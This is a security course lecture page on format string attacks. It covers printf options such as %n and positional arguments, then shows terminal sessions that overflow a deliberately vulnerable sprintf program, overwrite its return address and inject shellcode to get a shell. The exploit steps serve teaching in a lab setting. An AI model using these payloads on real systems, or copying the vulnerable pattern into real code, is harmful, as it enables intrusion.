SI485H: Stack Based Binary Exploits and Defenses (F15)

Home Policy Calendar Resources

Lec. 19: Format String Attacks 1

Table of Contents

1 Format String Attacks

A format string attack is an alternate form of exploiting programming that doesn't necessarily require smashing the stack. Instead, it leverages the format characters in a format string to generate excessive data, read from arbitrary memory, or write to arbitrary memory.

At the heart of a format string attack is a casual programming error regarding format strings that allows the user to provide the format string portion, not just the arguments to the format. For example:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char * argv[]){

  printf(argv[1]); // user controls the format
  printf("\n");
}

In this program, the user provides the format portion of the printf(). When we run this, for most of the common things, it doesn't matter:

user@si485H-base:demo$ ./format_error "Hello World"
Hello World
user@si485H-base:demo$ ./format_error "Go Navy"
Go Navy
user@si485H-base:demo$ ./format_error "%x"
b7fff000

However, notice what happens when you give a format character, i.e., one that starts with a '%.' The format character is interpreted and the output is an address, an address on the stack, more precisely. What if I were to give it something longer? What if we were to give it something that would cause a memory address to be dereferenced, like a '%s' :

user@si485H-base:demo$ ./format_error "%s.%s.%s.%s.%s.%s.%s"
4.??u?.UW1?VS???????unull).(null).?$?U?
user@si485H-base:demo$ ./format_error "%s.%s.%s.%s.%s.%s.%s.%s"
Segmentation fault (core dumped)

We can actually get the program to crash, and from we've seen so far, getting the program to crash is usually the first step towards exploiting the program, which is what we'll eventually do.

2 Uncommon Formats and Format Options

In order to full leverage the power of the format, we need to review the full list of formats and format options. You should refer to the manual page for all the details man 3 printf.

2.1 %n : Saving the Number of Bytes

Format printing services allows you to save the total bytes formatted into a variable. There is a decent chance you've never heard of this format, but it actually is surprisingly useful for certain tasks. For example, given a format and its arugments, it is not obvious how to determine how long the output is until it actually formatted.

Here's a basic example, of using %n:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv){
  int count_one, count_two;

  printf("The number of bytes written up to this point X%n is being stored in count_one, "
         "and the number of bytes up to here X%n is being stored in count_two.\n",
         &count_one,&count_two);

  printf("count_one: %d\n", count_one);
  printf("count_two: %d\n", count_two);

  return 0;
}

The %n format matches to an address, in paticular an address of an integer, at which the number of bytes formatted up to that point are stored. So, for example, running this program, we get:

user@si485H-base:demo$ ./format_n 
The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113

Note that the %n character is not actually produced in the output: it is not printable. Instead, it only has a side effect.

Ok, so why does this format exist? Well, there are some really practical uses, for example, consider counting the digits of a number read in using scanf():

user@si485H-base:demo$ cat scanf_n.c
#include <stdio.h>
#include <stdio.h>

int main(int argc, char * argv[]){

  int a,n;

  scanf("%d%n",&a,&n);

  printf("Number: %d Digits: %d\n",a,n);

}
user@si485H-base:demo$ ./scanf_n 
1234567890
Number: 1234567890 Digits: 10

Or for example, to do text align … there are a lot of reasonable reasons to have this format.

2.2 Format Flag and Argument Options

Another tool of formats we will need is some of the extra options for formats to better manipulate the format output. So far you are fairly familiar with the conversion formats:

  • %d : signed number
  • %u : unsigned number
  • %x : hexadecimal number
  • %f : floating point number
  • %s : string conversion

What you might not be aware is there is a wealth more options to change the formatting. Here's a sample program that will illuminate some of these, so called "flag" options:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char * argv[]){

  int x = 0xdeadbeef;

  printf("%%d:(%d)\n",x);
  printf("%%u:(%u)\n",x);
  printf("%%x:(%x)\n",x);
  printf("%%#x:(%#x)\n",x);
  printf("%%#50x:(%#50x)\n",x);
  printf("%%#050x:(%#050x)\n",x);
  printf("%%1$#050x %%1$d:(%1$#050x %1$d)\n",x);
  printf("%%#050x:(%#050x)\n",x);
  printf("%%1$#050x %%1$d:(%1$#050x %1$d)\n",x);

}
user@si485H-base:demo$ ./unusual_formats 
%d:(-559038737)
%u:(3735928559)
%x:(deadbeef)
%#x:(0xdeadbeef)
%#50x:(                                        0xdeadbeef)
%#050x:(0x0000000000000000000000000000000000000000deadbeef)
%1$#050x %1$d:(0x0000000000000000000000000000000000000000deadbeef -559038737)
%1$#050hx %1$hd:(0x00000000000000000000000000000000000000000000beef -16657)
%1$#050hhx %1$hd:(0x0000000000000000000000000000000000000000000000ef -17)

The first flag option is the "#" which is used to add prefix formatting. In the case of printing in hexadecimal it will add '0x' to the start of non-zero values. That's pretty useful.

The next option is adding a number prior to the conversion argument, as in %#50x. This conversion will right adjust the format such that the entirety of the number takes up 50 hex digits. If you were to add a leading 0 to the adjustment, as in %#050x, the format will fill those blank spaces with 0's.

Perhaps the least familiar option you've seen is the m$ format where m is some number, allows you to refer to a specific argument being passed. In the example above, we refer to the same argument twice using two different conversion formats to follow. This is really useful to not have to pass the same argument multiple times; however, when you use the $ references, you have to do for all the format arguments.

Finally, we have the half-conversion option h which says to only convert half the typical size. In this case, since we are working with 4-byte integer values, that would mean to format a 2-byte short size value when using one h, or a single char length 1-byte value with two, hh.

2.3 Flag Options for Strings

With strings, things are similar but a bit different. Here's some example code:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char * argv[]){

  char * string = "Go Navy! Beat Army!";

  printf("%%s:(%s)\n",string);
  printf("%%50s:(%50s)\n",string);
  printf("%%.5s:(%.5s)\n",string);
  printf("%%50.5s:(%50.5s)\n",string);
  printf("%%-50.5s:(%-50.5s)\n",string);

}
user@si485H-base:demo$ ./string_formats 
%s:(Go Navy! Beat Army!)
%50s:(                               Go Navy! Beat Army!)
%.5s:(Go Na)
%50.5s:(                                             Go Na)
%-50.5s:(Go Na                                             )

Like with numbers, we can specify a length flag to right adjust the string up to some specified size, but we can't fill in that with 0's. Instead the space is filled with spaces.

Unlike with integer numbers (but can be done with float numbers) we can also truncate the length of the format if we use the . option. The number following the . says how many bytes from the string should be used, and this can be combined with the right adjustment. And, interestingly, the right adjustment can be flipped to left adjustment with a negative sign.

While this is all on the output side and you can imagine where it might be super useful, from a security perspective of overflow protection, the right adjustment becomes a limiter to how many bytes can be written to the target address:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char * argv[]){

  char string[10];

  scanf("%10s",string);

  printf("%s\n",string);

}
user@si485H-base:demo$ ./scanf_format 
HELLLOOOOOOOOOOOOOOO
HELLLOOOOO

3 Using formats in an exploit

Now that we've had a whirl-wind tour of formats you've never heard of nor ever really wanted to use, how can we use them in an exploit. We'll look at one method in this lesson involving stack smashing, but we'll see some other techniques soon.

Here's the program we are going to exploit:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void good(){
  printf("good\n");
}

void bad(){
  printf("bad\n");
}

void vuln(char * str){

  char outbuf[512];
  char buffer[512];

  sprintf (buffer, "ERR Wrong command: %.400s", str);
  sprintf (outbuf, buffer); //<--- used as a silly copy

  printf("outbuf: %s\n", outbuf);

}

int main(int argc, char *argv[]){

  vuln(argv[1]);

}

This is a rather contrived example of using sprintf() to do a copy. You might think because in the first sprintf() the %.400s format is used, this would not enable a overflow of buffer or outbuff. For example, this does not cause a segmentation fault:

user@si485H-base:demo$ ./format_overflow `python -c "print 'A'*1000"`
outbuf: ERR Wrong command: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

True, we can't overflow buffer, but we can overflow outbuff because buffer is treated as the format character. For example, what if the input was like:

user@si485H-base:demo$ ./format_overflow "%550x"
outbuf: ERR Wrong command:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               bffff897
Segmentation fault (core dumped)

And if we look at the dmesg output:

user@si485H-base:demo$ dmesg | tail -1
[181031.140058] format_overflow[16736]: segfault at 20202020 ip 20202020 sp bffff6b0 error 14

We see that we overwrote the instruction pointer with a bunch of 0x20 bytes, or spaces! Now, the goal is to overwrite the return address with something useful, like the address of bad().

user@si485H-base:demo$ objdump -d format_overflow | grep bad
08048481 <bad>:

To do this, we need to do the right number of extended format to hit the return address, We can do this by first using 0xdeadbeef and checking the dmesg output:

user@si485H-base:demo$ ./format_overflow "%500d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
Segmentation fault (core dumped)
[181507.663004] format_overflow[16817]: segfault at deadbe ip 08048504 sp bffff6b0 error 4 in format_overflow[8048000+1000]
user@si485H-base:demo$ ./format_overflow "%501d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
Illegal instruction (core dumped)
[181507.663004] format_overflow[16817]: segfault at deadbe ip 08048504 sp bffff6b0 error 4 in format_overflow[8048000+1000]
user@si485H-base:demo$ ./format_overflow "%502d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
Segmentation fault (core dumped)
[181516.038682] format_overflow[16827]: segfault at 80400de ip 080400de sp bffff6b0 error 14 in format_overflow[8048000+1000]
user@si485H-base:demo$ ./format_overflow "%503d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
Segmentation fault (core dumped)
[181519.371290] format_overflow[16832]: segfault at 800dead ip 0800dead sp bffff6b0 error 14 in format_overflow[8048000+1000]
user@si485H-base:demo$ ./format_overflow "%504d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
Segmentation fault (core dumped)
[181522.598268] format_overflow[16837]: segfault at deadbe ip 00deadbe sp bffff6b0 error 14 in format_overflow[8048000+1000]
user@si485H-base:demo$ ./format_overflow "%505d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
Segmentation fault (core dumped)
[181526.367333] format_overflow[16842]: segfault at deadbeef ip deadbeef sp bffff6b0 error 15

So if we use a 505 byte length %d format, the next 4-bytes we write is the return address. And adding that, we get what we want:

user@si485H-base:demo$ objdump -d format_overflow | grep bad
08048481 <bad>:
user@si485H-base:demo$ ./format_overflow "%505d$(printf '\x81\x84\x04\x08')" 
outbuf: ERR Wrong command:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               -1073743725??
bad
Segmentation fault (core dumped)

We can also get this to execute a shell in the normal way (note how I adjusted the jump point using dmesg).

user@si485H-base:demo$ ./format_overflow "%505d$(printf '\xef\xbe\xad\xde')$(printf $(./hexify.sh smallest_shell))"
outbuf: ERR Wrong command:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               -1073743746ᆳ?1???Phn/shh//bi??
                                                                                                                                                                         ̀
Segmentation fault (core dumped)
user@si485H-base:demo$ dmesg | tail -1
[181798.445440] format_overflow[16919]: segfault at deadbeef ip deadbeef sp bffff690 error 15
user@si485H-base:demo$ ./format_overflow "%505d$(printf '\x90\xf6\xff\xbf')$(printf $(./hexify.sh smallest_shell))"
outbuf: ERR Wrong command:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               -1073743746????1???Phn/shh//bi??
                                                                                                                                                                           ̀
$ echo "I did it!"
I did it!
$